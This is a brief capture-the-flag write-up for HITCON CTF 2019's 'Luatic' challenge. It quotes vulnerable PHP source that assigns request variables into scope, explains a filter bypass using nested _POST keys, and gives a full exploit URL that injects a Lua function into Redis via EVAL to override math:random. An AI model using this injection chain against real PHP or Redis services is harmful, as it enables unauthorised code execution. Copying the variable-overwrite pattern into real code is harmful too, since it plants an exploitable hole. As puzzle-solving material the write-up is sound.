# Luatic First Blood is difficult to get  ``` foreach($_REQUEST as $k=>$v) { if( strlen($k) > 0 && preg_match('/^(FLAG|MY_|TEST_|GLOBALS)/i',$k) ) exit('Shame on you'); } foreach(Array('_GET','_POST') as $request) { foreach($$request as $k => $v) ${$k} = str_replace(str_split("[]{}=.'\""), "", $v); } ``` Obviously you can override global variables, but it blocks some keywords... still you can use `_POST[whatever]` because the checking in the first block does not check for value. ``` $redis->rawCommand($MY_SET_COMMAND, $TEST_KEY, $TEST_VALUE); if ($redis->get($TEST_KEY) !== $TEST_VALUE) die('Something Wrong?'); $LUA_LOTTERY = "math.randomseed(ARGV[1]) for i=0, ARGV[2] do math.random() end return math.random(2^31-1)"; $seed = random_int(0, 0xffffffff / 2); $count = random_int(5, 10); $result = $redis->eval($LUA_LOTTERY, array($seed, $count)); ``` Obviously you need to override the random function... that rawCommand can be used to run a Lua script in Redis. But dot `.` is filtered in the input, so you cannot override `math.random`... But you can override `math:random`... `http://54.250.242.183/luatic.php?_POST[MY_SET_COMMAND]=EVAL&_POST[TEST_KEY]=function%20math:random(q)%20return%203%20end&_POST[TEST_VALUE]=0&_POST[token]=<token>&_POST[guess]=3` then you need to run without `_POST[MY_SET_COMMAND]` to get flag. Reference: https://stackoverflow.com/questions/4911186/difference-between-and-in-lua ###### tags: `HITCON CTF 2019 Quals`